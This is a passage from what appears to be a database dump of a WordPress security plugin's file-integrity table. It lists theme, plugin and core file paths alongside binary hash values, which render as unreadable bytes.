���','',0,'?'),('�&\ZtR.�Ϳ\r�TTF','wp-content/themes/hitmag/inc/kirki/assets/images/jquery.fs.stepper-arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/!C�\ra2���ռ;��2',' �^���$Vy˃0?�N�}�H6��?鶬','',0,'?'),('�\"\\!������ja%��','wp-content/themes/university-hub/inc/hook/basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0VƆ��K��#�ext�8','�׫�:�|�Ϩ\'Ldvo�҇�mS/�Z�w㨴�','',0,'?'),('�$����!���+&q�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$sR��iNS&&$�d','��l��W�+��� ��5�� ���\rզI9Yk','',0,'?'),('�&B�H;,;\n�o\Zk҈','wp-content/themes/skt-pathway/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���kM\"��$ݩg�e','��E��V��S��]� s$k�F��g��:�','',0,'?'),('�1��ϣ�����I�','wp-content/plugins/wordfence/lib/wfImportExportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����������+>��','�dlы۹`�������J���#|i{�','',0,'?'),('�3��ͅ	2��&薜','wp-content/themes/hitmag/inc/kirki/assets/js/controls/radio.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{4��ȦAGȲ�n��\"','I��\r�α���m-g����$s�=�\\�O���&+','',0,'?'),('�;�[����/�9 _','wp-content/themes/simpleshift/assets/js/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M+�#\'3�8�{��~B','O�Zxk�ް ˲�yQ*c���L���x\Z�D�(	�','',0,'?'),('�<��|~E.�Y^�!�]','wp-admin/js/widgets/media-audio-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&t��K!��1��vDb','9���:��%�B�Ɖ\\c֏��WpX�	�Q���','',0,'?'),('�?�\n5��H�?����','wp-admin/css/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������`�ˎz��\Z�','*���}\0P������y��]�yOr�@�|','',0,'?'),('�DV�ɪl�-�XC��`\\','wp-content/plugins/wp-cerber/assets/flags/cu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѝhm!�7���3.�','P�bLO���*]���3�o	}���z�xN��','',0,'?'),('�K]��,�6#�,L','wp-content/themes/graduate/tp-education/tp-single-course.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8C�h,m�_�]���','Y5��eY�A��t��d\'܊���	vP�*ܑ','',0,'?'),('�S�fV�v̾�ܨ�l�','wp-content/themes/catch-flames/js/catchflames-ielte8.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D!��[M�y��	m�','\nlqO�~)]�y�*�{-�X{&;��k�','',0,'?'),('��x�������߳\"�','wp-content/themes/saybusiness/inc/customizer-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0�i�6K�<���','�����f���hY��R�D�($pR�\0\r�75�','',0,'?'),('��1[.��9f?|��5*�','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/radio-buttonset.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�j����ֽN@>�',' �\'9Н	�o��1Kf��y��q���n�0\\iA','',0,'?'),('�����b���I�CF-','wp-content/themes/education-hub/third-party/font-awesome/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��rFR��	S&2�','����}��˹t$��)�ʦ��P��1��~܀��','',0,'?'),('����?a�Tע�;��s','wp-content/themes/exoplanet/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��y��$Ƌ��8���','O��ll���� ��3g�F<2CX�D-ŽB��','',0,'?'),('����t�P���l','wp-content/themes/brickyard/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K����!�)��f�#�','R���s/�b�ϫ���}��43�RJ��X�7','',0,'?'),('���׻u�t��Ũ�','wp-content/themes/monograph/page-templates/sidebar-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[��0�j�~ʘ�;','t�KĻI�%��	N˸~�5�r4qi�n3�1','',0,'?'),('�����juGCtO���','wp-admin/css/colors/coffee/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g_ZY�Y����/','oI���P�g��K7�$v��vxlk���t��Ea�S','',0,'?'),('���)���[82a�','wp-content/themes/saybusiness/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������s}\ro��','l�(mY��s\0�OH!����1�LU��\Z�>,.�','',0,'?'),('���v�\Z#i�[amh.','wp-content/themes/brickyard/template-full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\ı�s�h(���','��\0Ŋ\nA ���B�_��͵v�%K!B�2��F','',0,'?'),('��N�W��&pr\'��','wp-content/themes/authorize/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.W̧�޵��(��','�-��\0/�_�\n6~�T��O�q�t���:p�:','',0,'?'),('����}-I��T���','wp-content/themes/metro-magazine/inc/widgets/widget-recent-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��	�4�aU];VM\\�','�h���^m���PTT�Ue*�DBS��','',0,'?'),('����V鐊�.�6','wp-content/themes/hitmag/inc/kirki/assets/js/controls/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gF&��\n�e��W��~�','qShO�n֙#�Ц1_�����=���3�h�','',0,'?'),('��.m�Z��<�9A�7�A','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/selection/active-line.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!���t�zt��KG','�7�|\Zwqe�׹��uFN,:�\n��,M3S���B','',0,'?'),('��l�.H|S���{��','wp-includes/js/jquery/ui/effect-transfer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��H������*��l�','%��({cI�}��,�Ѧ�)��1`WɆ','',0,'?'),('��f4O�3W`�hC��','wp-content/themes/brickyard/images/icon-tag.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rV���{�����P_3','�9;O��#�d�\Z��_�o�2���{��Q�aϼ','',0,'?'),('��#�u������\"L�','wp-content/themes/catch-flames/js/catchflames-ielte8.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ktr����̈��','WZ�,	�Yս}^����k����1�V ��)�','',0,'?'),('���ISU`u���T��F','wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�{�bOs�_a��>','m�n5��ߐ֞βgJ�\\�����3�����','',0,'?'),('��r%�̺Xl�-*�~�','wp-content/themes/university-hub/lib/breadcrumbs/breadcrumbs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�^�l�����>T�v','Ꙏ�V=1������Lc֫*�fr�R����v�','',0,'?'),('�����W��Z�5�R�','wp-content/themes/exoplanet/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��K��.��?l9I��','LC�Oc�fk�µ�W[sJ$�>�t��,���','',0,'?'),('�ʚ�{�(���\\i�7.','wp-includes/Requests/Exception/HTTP/431.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s|b$��ѓ<��','�ꅱ��/Y6_���w�pk�w���0���','',0,'?'),('��}�^72������','wp-includes/Requests/Exception/HTTP/415.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��Tb�̮�JU�','v%�_�\0�b$m�&`���(�=�m<�b\Zo0p','',0,'?'),('��=\r�#� �b���','wp-content/themes/hemingway/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��\\�Ц<�0`\\�OC','��+�J+�\nm�V���ŎT���-j�m֠~o','',0,'?'),('���\nÎ�T8�F�r','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/selectize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tr>f+2`bU�V8','N��������_��mw�s�/I�Rú]�T�','',0,'?'),('��l\Z`<�#�� %��>}','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-sortable-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��7��B{�⋲I�','�N,�GKA���|��*��Y$��\"\Zg^v��B�N�','',0,'?'),('���3Ȉ��m�Y4���','wp-content/plugins/wordfence/js/wfselect2.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�������!�.���i','l�k}[�ZjA�.!��=+5�+�~q� 1','',0,'?'),('���3�qc;*�V\08�\\','wp-content/themes/twentynineteen/sass/variables-site/_transitions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӌؠ����v&��Ad','K��s;���o���ZÏ�Y�S���!e������','',0,'?'),('�\Z1Āi�J���','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/solarized.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{=���{֕���e3H','��\n���Gek^(�%?�I.~�#����X�','',0,'?'),('�C5x��Һ\nI{h�%','wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�H�P<�|3','��ڤ�C�p���9���L7<�~��d��l�%','',0,'?'),('���an���V=Ty X�','wp-includes/SimplePie/Copyright.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��>�����ԪQ','�i��%�ܴ��E�^g���2�z,�@�Q��V','',0,'?'),('��葿l��@�\\��','wp-content/themes/lovecraft/genericons/font/Genericons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XRO��,-�C|���h(�','E5m�?��@<��Dޏ�q�}b�y�MS�\Z�v','',0,'?'),('�#-�8Q���R1ޭ','wp-content/themes/newsmag/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\n�iu\'��Jl֡7�','i���}��E���&1��t;&�5{��nQ�>','',0,'?'),('��/��-O�ͮ\'�]0','wp-content/themes/advance/inc/kirki/includes/class-kirki-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ks���7t���M��','�/�;!2��\\2�h�9D�DvZt:F�Ӻ�%','',0,'?'),('�.��\rí�v�ǯ`�5','wp-content/themes/singularity/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����!#�2�-�$��','�[<��S)\"Η&@$��H�S���?^�ć:','',0,'?'),('�8E<����:����','wp-content/themes/advance/images/link.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�̺��k���A/','e:Dffg�>�;�ӵ刳-�\\�W1+*-D�H','',0,'?'),('�L�3����^���\'�','wp-content/themes/advance/inc/admin/img/1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�ۨ��Χ�K͋e','��7�Z߼],�!`�\"�h���:��aǎ�������','',0,'?'),('�N<w()/�E��.�bI','wp-content/plugins/wp-cerber/assets/flags/st.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��l��Iy���`�f�','�x����˹�5��0��s�	��.:l���','',0,'?'),('�_sT樋\Z�0��\\y','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/fold/xml-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��̵��_7����C�','S��d\r��x�i�Q]\\��mG-\\�ޘ�:�','',0,'?'),('�g*Ka��^o-�S���','wp-content/themes/catch-responsive/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U��\r&��%]��o','��CI�;/���lk4�v�|��Q>ܝ�A��+,','',0,'?'),('�} �yT��Z�H�cDJ','wp-admin/js/custom-background.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�2� �S�o-E��','����Dʹ�:&�o�n�����L���3�,E','',0,'?'),('��8��TJ\"�M��\\','wp-content/themes/advance/inc/kirki/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�4���l�t;Q','\03c��k���if{��\Z�g��6��kW���','',0,'?'),('��V~E,�����ޜ�','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-number.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�*@#gd}�?�b','�c�j�.\n�g�~�G���ŏDz�`n�=','',0,'?'),('���S���{|�\"uZz�','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-aside.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�/�� ��j�t��J�','w;*�Ҙ�\rp�<L$�\r��\r��H\Z���','',0,'?'),('����\n�c��A�5_n','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/fold/foldcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v����M\ZavS$�&k','�?��~�T��\"4�9K�����8���գ�J��','',0,'?'),('��u>mI��5Z�m_��[','wp-content/themes/advance/inc/images/layout2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� \"��WE�p���H�4�','��6�=@�g�Û���i}T �e}����Н','',0,'?'),('����\n;<�h����','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/multicolor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��C�h���/.��-�','T�\'�nd���5���:f��65Tj�_|�$��S','',0,'?'),('����ba��j���,׶Y','wp-content/themes/quicksand/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�t@��1�UW�#','��F M��JvA<͋FrS;���̩�ۈ��Q�','',0,'?'),('��{�0l(Ʋu9,wS�u','wp-includes/js/media-audiovideo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ж���t\Z�����','s<~d;lL�n�_u+1��jDO����\\�\0��','',0,'?'),('����4Oj>��5 ','wp-content/themes/wp-simple/inc/kirki/includes/customizer/scripts/class-kirki-customizer-scripts-tooltips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m<2��3���	��','��D1-.T�1Q8����m�}�pr����pv','',0,'?'),('����=\0�%&h��1��','wp-content/themes/simpleshift/assets/images/preview/hills.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l���YbR�v','v/\Z5/�\nH�VD�̋��WF��u�>��h�v�','',0,'?'),('���@6�ߝ\0AhHc�','wp-content/plugins/wp-cerber/assets/flags/hm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�N��n�[���','��|�S�Qw\0��j�G��N��*M����v%','',0,'?'),('���ǹ�u��I𤘱]','wp-content/themes/enigma/home-services.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*Ġ�:n�g��	�3�','3\n���C��j�t������͋��\"�ȧA\0�r','',0,'?'),('��)!)�6��>}�74','wp-includes/css/dist/block-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M\"7����g��6>','WM�����r�0���y7:5э�C<�o����','',0,'?'),('��*.l*�5sݼѕע','wp-content/themes/gambit/inc/customizer/functions/custom-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݤ8\'�\\�J���$�','��ңo�\"����XL�(���!1�u9�\Z','',0,'?'),('��!;�_�5�V�U*','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/lint/javascript-lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Uv�	*��Ny����-%','�$���7\"6�䨞}�{?�ؽ2��]E�5','',0,'?'),('����2��(7��#-','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-custom-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�sIo�Op��M2��','�콲�o��5�~F뷘�\Z���Q�K,R��(','',0,'?'),('���L��V�Y��*','wp-includes/js/plupload/moxie.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|A��09��K�:���','��[\n��Y�@sZ�F�Ul�+�Έ�f���Ǩ\0','',0,'?'),('�K��{\'��1���','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/spacing.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|b�)5�2=�S9�dF�','7��\0bH,2�_9��&��=���]$S��T�V�','',0,'?'),('�E�\Z��\Z�)��,','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����	;�����x','.��zF2�V�^W�,#g�!t���t���g8�','',0,'?'),('�	lA7�\r[��C�{w�Y','wp-content/themes/authorize/assets/stylesheets/font-awesome/less/mixins.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���񫖺 ��r�','M�^��0�^XH͛9��y��4��f1t�l3','',0,'?'),('� �A$ۤfC�N��37','wp-includes/query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O���o�y&���u','Z�@�?@��ή��=���*^(21����y����','',0,'?'),('�(���ה�W�h@=a','wp-includes/images/smilies/icon_mad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�!�@�c�0�S�','�������d[O:LJ�����jl}�q�','',0,'?'),('�7�0���,�		M','wp-includes/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qy���?�;�8�V\n�','\0�-��]뮳��XEt)�`��1�C�}Mr2�/','',0,'?'),('�C\0��9��%e��?�','wp-content/themes/brickyard/functions/about/images/doc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڧ�^Ns�h�l��','��a�/Y�m��n��W����0B��','',0,'?'),('�NR:�ul�5	e�J�~','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/color.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����.d>G�\0�kN/G','��-gZ��y�OeO�\0�髚aj�v�\Z��k','',0,'?'),('�T`s��C.���r|6w','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/javascript/typescript.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ijoi|,zT�s�H�','�����f�/�EB�]#_3툶�sN�7z�\r��','',0,'?'),('�T����X���HWK�','wp-content/themes/graphene/images/headers/sparkle-thumb.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�p4��^H:��+��',',였�9�Eۑs��:\n�u-RLA���','',0,'?'),('�^� s4��va���\\�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/the-matrix.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t���m�)g�/��','`s�v��s�(�*:�����s�uOJ-�z�LN9','',0,'?'),('�g\Z��\\�\r�`=�m�','wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\r�L����{ǀ�','����VZ+��&�\r�Щ�U;�L)R�!ӵ�','',0,'?'),('�i���B�j����]','wp-includes/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G8�J+��	��z','>8���\'X�i�Ub�Gн�,<T`6��4Ѝ�','',0,'?'),('�l8�!�y{�����+\0P','wp-content/themes/newsmag/assets/sass/layout/_layout.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aն�e=����r�','�Qq�\rM�Jv��0���<s2Kъ�j�U�','',0,'?'),('�xv���Օ+3�B','wp-content/themes/enigma/home-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H��F��|Y@�Q�','��|ljmM��*�t�Yt�0�Dw��gV:d��','',0,'?'),('����v���ό�Y9�','wp-includes/ID3/getid3.lib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CPb$M6̟��ҁ�','\"\Z^�,8>K����@��湅����l��|AF��','',0,'?'),('�������A^�\Z�%�\r�','wp-content/themes/brickyard/docs/assets/images/img4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����e>�w���?S','`^~tbKK���0��:���<J��\n\0��WM8\Z','',0,'?'),('���\'��[�ơ��8W','wp-content/themes/exoplanet/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|��Ԇ�^�tn�ap','�ί�^/t��t�y=���\"*o���C@c�','',0,'?'),('���X����H�o�v�','wp-admin/css/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�q㤭�{���$I','ŁnGĂ�M\"k�7�w\"ҥ�!�I[�1','',0,'?'),('��!N��D�w�`��[�','wp-includes/js/jquery/ui/dialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�屬�U��u���z̜','H7�pn�\Z��8����__E<��\r��','',0,'?'),('��U�]>�rք�{��v','wp-content/plugins/wp-cerber/assets/flags/cf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��oG��`?���','�\0�m�٢K��K��ǡNЙT���	��','',0,'?'),('���Xp����~0D','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�oe�~��oB2�_;','5�q��SrL�]�OX����sq����+l<��ɒ','',0,'?'),('��F�7��x��!�}��','wp-content/themes/graduate/assets/plugins/js/jquery.sidr.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ë[)�}�(�R�PiƆ�','�LK\Zw1�p(������R�h��\"�T��l8','',0,'?'),('���Bq�t����L��','wp-content/themes/newsmag/inc/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���pHr�Q�Z|��O','՚3��l����&=\r�?��w�\0��kp!�','',0,'?'),('��֗]NR���S{qv?�','wp-admin/css/wp-admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',*i����[p]��<','r5S�E�?29/�)��_�PJv�Vh���R�','',0,'?'),('��\Z,z���Ґ�U�','wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y[�&A*zϦ/��?<�','�������Dn��N����AU)n�J�','',0,'?'),('��R�!�=Zoj�$v�','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-datetime-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';@O��2��g�4m*8�','�\nG(~��g��q��u����ֽ4�ŲQ','',0,'?'),('���3�(d����u�','wp-content/themes/event/inc/customizer/functions/frontpage-features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fo%�6��Oex\Z.O�','�zG�L+ۮ�Y��,]�K��6�5���a��','',0,'?'),('��O܎$8��J�e��','wp-content/plugins/wordfence/models/scanner/wfScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H p3+$������','�I�E���|��Ap��ך�X�9n@��','',0,'?'),('���5��)&J7^�Z','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/textile/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����%\\=��<_�','Kᑈ++�^=��l}M�����~��b\"���','',0,'?'),('��*v�<�TC�U�XJn','wp-includes/blocks/column/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\'��������E�4�','z�,�g3�l[�9�v[�=\rW�\'3e�c�INڷ�','',0,'?'),('�\0��߯NI���','wp-content/themes/twentynineteen/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=�D�F/�u+:��@�','�=7���a(P�w�Ɯ&���|�������','',0,'?'),('�����n�E��','wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-site-lockout-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nOΨ�J���z�<','ԥ6Wi��� F4�hd��4��ˡV8�\0ݟ�','',0,'?'),('�V�܂0\0U�`�5C>','wp-includes/css/dist/components/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�t�<���l�j�!','QR0�2�>�S��\\���}�a�sz9�<','',0,'?'),('�\rq��O����D�zs','wp-includes/pomo/pomo/translations.php',0,'��C���*\Z�\'��','��C���*\Z�\'��',')��P��Š�ObxZ-dtWN��ǧ�~x�^Y��','',0,'?'),('��	�6��!\"�P	','wp-content/themes/twentytwentyone/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����M���<HC�:@�','�H�E���\rA��l8k#�h�@w�}�}','',0,'?'),('�\Z� �R����[�\'�>','wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('�$�����j�X�])D:','wp-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f+ʅ�D`\0��`d->}','|�:m\"�S,�h�k���\Z8V��0d�eCe�','',0,'?'),('�2�\\�17Հ�wi�{','wp-includes/js/dist/vendor/wp-polyfill.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P����$@A.0�Qt','@b�/E�ؔå��;M	�ۙZRİ�x����','',0,'?'),('�H�)������jH�j','wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�\'B�l�If���\"c','��O$��U?��\nR��y���V�=�T���Z','',0,'?'),('�H��u~�R=b�\0;�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/customizer-dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�.p��=����','p�� aк^�\\F}�dL0�m�dҌ��v^;m�','',0,'?'),('�Ux�[qe;{l�2�b�{','wp-content/themes/authorize/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�k�r��c�uў,c','�$���H6��Pq�<q��\0�u���x��9l)','',0,'?'),('�]�!��M����a�','wp-content/themes/simpleshift/inc/kirki/kirki.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'_(Z���Š�','�-���Dn`B��\n��{`FD��׹f�37:4Bj��','',0,'?'),('�bZ~�y4y�c`z5�5','wp-content/themes/gildrest/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&1՞7� �u��{','��\Zb��W�c~K�W��q�A�\\t;6�6�u��','',0,'?'),('�j%M�ɍ��p)Z��','wp-admin/images/generic.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\'�[#98!�','�{u���K[g͆Ex�{�:߼��lͨG��','',0,'?'),('��2��V��\\�Q�0��','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/merge/merge.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����m-&���,','d���9�4��#Z����r��hj\'��]s�ܩ�','',0,'?'),('���v�*~����ߏ','wp-content/themes/twentytwentyone/assets/images/playing-in-the-sand.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��8I/CM��x��','��W}u�}��v��m��7=E�K�Y4','',0,'?'),('�����Д	W�F�)?M','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�(F�T<Q~�','\\�QA�:KJ��,p�Ǿf���ʗ�9gH�9@]','',0,'?'),('�������x\r�G�F&�3','wp-content/themes/simpleshift/inc/kirki/includes/sections/class-kirki-sections-hover-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�~n�gl���?~	��','Ml?k!nH��h��7�o�\Z���`�5�-���n','',0,'?'),('��RKQ�5v�-��	��','wp-includes/css/dist/edit-post/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��b�E��y�L�J��','—9 �`��\'@GGXLH��K����Ħ�ᚆ','',0,'?'),('��ۻ�>�\r��J��+�','wp-content/themes/enigma/core/menu/default_menu_walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','胿B�ߵG4[��}�','n��q.ؠ�&��\'�[w5����8P�[��M�','',0,'?'),('����\0z�� d�9�','wp-content/themes/saybusiness/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��� �Ӂ�+Ln^?','��\n�|	